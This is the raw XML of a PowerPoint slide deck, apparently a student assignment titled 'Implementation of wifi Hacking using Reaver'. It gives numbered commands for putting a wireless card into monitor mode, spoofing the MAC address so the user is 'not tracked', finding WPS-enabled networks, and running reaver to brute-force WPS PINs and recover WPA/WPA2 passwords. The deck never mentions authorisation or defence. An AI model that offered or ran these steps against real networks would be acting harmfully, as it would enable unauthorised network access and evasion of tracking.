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F2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0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="107" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="73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44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4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5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7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549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8/15/21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6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3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0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4D82E-40F8-7E42-B1D5-290C33484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Skill-6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ABC48-67DF-8B44-8108-E19F16AC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Implementation of wifi Hacking using Reaver</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Neon coloured light having infinity shape">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91563E-FC4E-4842-AA70-C1D32EE38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1" r="25179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2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F4D6-C5E4-BB4D-B638-CDF58519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4" y="4933019"/>
            <a:ext cx="3868089" cy="258538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/>
              <a:t>8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/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reaver –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wlan0mon –c &lt;Channel n0&gt;  –e &lt;ESSID&gt; -b &lt;BSSID&gt; -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/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Now finally we are using reaver to get the password of WPA/WPA2 network.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Content Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A88CB46-E4B0-5141-937F-45E8F42E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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="710252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76623C-CC1E-C540-B0FA-F773268A6107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9032" y="1280160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D76B4-B781-8C48-A5F2-20F036723110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1441853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1AA23-327C-1345-B72A-448A12D4D759}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9032" y="1610359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613FC-886A-E64B-AA89-717F738ECAD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3667496" y="2508653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F4D6-C5E4-BB4D-B638-CDF58519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5" y="3429000"/>
            <a:ext cx="3756670" cy="258538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/>
              <a:t>After some hours, you will get something like this.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>WPS PSK : X</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>	-X is password of wireless network.</a:t>
            </a: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" name="Content Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED9040E-643F-F54E-9392-AC7EB5F3A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42"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="710252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35E8FB-1709-FC46-BC8E-862825ED3FF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3431968" y="788710"/>
            <a:ext cx="3111336" cy="3038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34EC6-730D-AD48-A6FB-F480A4BC836E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853106" y="394447"/>
            <a:ext cx="2249423" cy="3038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F4D6-C5E4-BB4D-B638-CDF58519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5" y="4017333"/>
            <a:ext cx="3756670" cy="258538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/>
              <a:t>9.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reaver -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wlan0mon -b &lt;BSSID&gt; -p &lt;WPS PIN&gt;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4000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>if we know the WPS pin this command can be used to get wifi network password faster.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7FD2661-1D61-114A-9226-880574E2D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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10"/>
            <a:ext cx="7102529" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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667A4-866B-294D-B382-0497D0337142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2236496" y="906442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9194-4C2C-AD47-B8D4-8A4306212CD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2349774" y="1762072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FAA2D0-740F-AF48-9B6E-ED56734C2752}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2154720" y="3032021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39C75-7FA4-224D-97CA-F6DD86FBAA6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1680982" y="3907387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CCE889-DFB9-CB4D-983A-AE6A7E7F2AD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3337940" y="3907386"/>
            <a:ext cx="1713164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8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F4D6-C5E4-BB4D-B638-CDF58519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5" y="3607758"/>
            <a:ext cx="3756670" cy="258538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/>
              <a:t>After some time, you will get Details of wireless network.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>WPS PSK : X</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>	-X is password of wireless network.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7FD2661-1D61-114A-9226-880574E2D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42"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7102529" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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CD7615-E600-914A-B24A-9B4041D603AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5380011" y="115470"/>
            <a:ext cx="334085" cy="242338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F2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F651A-703F-6C4E-85CD-59268C3E7568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3431968" y="788710"/>
            <a:ext cx="3111336" cy="3038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143E89-3859-624C-8F06-FBD2A7FFEE2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853106" y="394447"/>
            <a:ext cx="2249423" cy="3038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coloured light having infinity shape">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A91563E-FC4E-4842-AA70-C1D32EE38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3" b="69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4D82E-40F8-7E42-B1D5-290C33484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1"/>
            <a:ext cx="9052560" cy="1069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REAVER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ABC48-67DF-8B44-8108-E19F16AC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212000"/>
            <a:ext cx="9052560" cy="4505792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0"/>
              <a:t>On average Reaver will recover the target AP’s plain text WPA/WPA2 passwords in 4-10 hours, depending on the AP.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F4D6-C5E4-BB4D-B638-CDF58519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5" y="2444174"/>
            <a:ext cx="3756670" cy="33393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/>
              <a:t>Open Terminal and use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t> command to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t> root directory.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5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iwconfi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5100" dirty="0"/>
              <a:t>For Checking the wifi-Interface </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Content Placeholder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7FD2661-1D61-114A-9226-880574E2D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98"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10"/>
            <a:ext cx="7102529" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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3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F4D6-C5E4-BB4D-B638-CDF58519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5" y="1759300"/>
            <a:ext cx="3756670" cy="33393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/>
              <a:t>2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airmon-ng start wlan0 :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>starting monitor mode for Analyzing wifi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="5100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7FD2661-1D61-114A-9226-880574E2D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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="7102529" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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F4D6-C5E4-BB4D-B638-CDF58519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5" y="1759300"/>
            <a:ext cx="3756670" cy="33393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/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5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iwconfig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5100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>Checking whether changed to monitor mode or not.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7FD2661-1D61-114A-9226-880574E2D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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10"/>
            <a:ext cx="7102529" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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1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F4D6-C5E4-BB4D-B638-CDF58519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5" y="1759300"/>
            <a:ext cx="3756670" cy="33393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/>
              <a:t>4. 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ifconfig wlan0mon down</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t> it makes wifi down</a:t>
            </a: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Content Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A88CB46-E4B0-5141-937F-45E8F42E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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10"/>
            <a:ext cx="7102529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EEA30B-EC24-2346-8EDA-3C9CE9CCDC0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271239" y="5670395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7BB51-D859-4D41-8866-9D979732412E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271239" y="5832088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A7F56-F2F1-E64C-8573-5227291D347F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1271238" y="6031446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5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F4D6-C5E4-BB4D-B638-CDF58519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4" y="1759300"/>
            <a:ext cx="3868113" cy="33393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/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5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macchanger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-a wlan0mon :</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>It changes the mac address to not tracked</a:t>
            </a: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Content Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A88CB46-E4B0-5141-937F-45E8F42E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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-200371" y="10"/>
            <a:ext cx="710252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E49FDB-5297-0441-91D0-E4E4853B2E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087138" y="5651572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2ABCD-BA5E-C849-8ACD-E0D7F28B2C43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087136" y="5831305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F261F0-47B0-B646-88AB-B1F65FFB8756}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1087136" y="6018645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F4D6-C5E4-BB4D-B638-CDF58519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5" y="1759300"/>
            <a:ext cx="3756670" cy="33393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/>
              <a:t>6. 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ifconfig wlan0mon up</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>It makes wifi up</a:t>
            </a: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Content Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A88CB46-E4B0-5141-937F-45E8F42E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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10"/>
            <a:ext cx="710252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655377-9350-A24B-A1EA-793F419EE712}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9032" y="6196324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B63FED-BA2C-AE43-B9A5-6216A5AD6E29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9032" y="6365469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449B28-72AE-E844-98CD-FDCCDF994B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276554" y="4445583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194BC-1989-554D-B127-858ADCC18DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276554" y="4614728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D6B533-0DEA-1742-AA8E-1379365C4675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1280411" y="4276438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0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F4D6-C5E4-BB4D-B638-CDF58519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935" y="2399385"/>
            <a:ext cx="3756670" cy="33393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/>
              <a:t>7.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5100" b="1" dirty="0"/>
              <a:t> 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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5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wlan0mon:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="5100" dirty="0"/>
              <a:t>This shows all the wifi networks which are WPS enabled</a:t>
            </a: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Content Placeholder 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A88CB46-E4B0-5141-937F-45E8F42E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16"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10"/>
            <a:ext cx="710252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9760F3-0F67-2D4A-BF07-2E7A6D6F4F1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9032" y="6196324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B0004-4A80-7C46-ABCB-B8EC90B4AB7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9032" y="6365469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E5601B-221C-0C46-9434-867C2751A623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306290" y="4445583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02C99-95C0-4844-A6D8-3F0CBF000892}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306290" y="4614728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44EE80-DE02-A340-81C2-7EDF35C85988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306289" y="4276438"/>
            <a:ext cx="1499839" cy="161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582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B1C31"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F0F3F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="E7297D"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="D517BA"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="B229E7"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="5B24D7"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="293EE7"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="177BD5"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="47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327</Words>
  <Application>Microsoft Macintosh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Sitka Banner</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>HeadlinesVTI</vt:lpstr>
      <vt:lpstr>Skill-6</vt:lpstr>
      <vt:lpstr>REAVER</vt:lpstr>
      <vt:lpstr>Open Terminal and use sudo su command to goto root directory. 1. iwconfi : For Checking the wifi-Interface </vt:lpstr>
      <vt:lpstr>2. airmon-ng start wlan0 : starting monitor mode for Analyzing wifi </vt:lpstr>
      <vt:lpstr>3. iwconfig : Checking whether changed to monitor mode or not.</vt:lpstr>
      <vt:lpstr>4. ifconfig wlan0mon down :  it makes wifi down</vt:lpstr>
      <vt:lpstr>5. macchanger -a wlan0mon : It changes the mac address to not tracked</vt:lpstr>
      <vt:lpstr>6. ifconfig wlan0mon up- It makes wifi up</vt:lpstr>
      <vt:lpstr>7. wash –i wlan0mon: This shows all the wifi networks which are WPS enabled</vt:lpstr>
      <vt:lpstr>8. reaver –i wlan0mon –c &lt;Channel n0&gt;  –e &lt;ESSID&gt; -b &lt;BSSID&gt; -vv : Now finally we are using reaver to get the password of WPA/WPA2 network. </vt:lpstr>
      <vt:lpstr>After some hours, you will get something like this. WPS PSK : X  -X is password of wireless network.</vt:lpstr>
      <vt:lpstr>9. reaver -i wlan0mon -b &lt;BSSID&gt; -p &lt;WPS PIN&gt;  -vv : if we know the WPS pin this command can be used to get wifi network password faster.</vt:lpstr>
      <vt:lpstr>After some time, you will get Details of wireless network. WPS PSK : X  -X is password of wireless network.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Skill-6</dc:title>
  <dc:creator>KALISETTI DHEERAJ BABU</dc:creator>
  <cp:lastModifiedBy>KALISETTI DHEERAJ BABU</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-08-15T12:07:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-08-15T14:53:37Z</dcterms:modified>
</cp:coreProperties>
</file>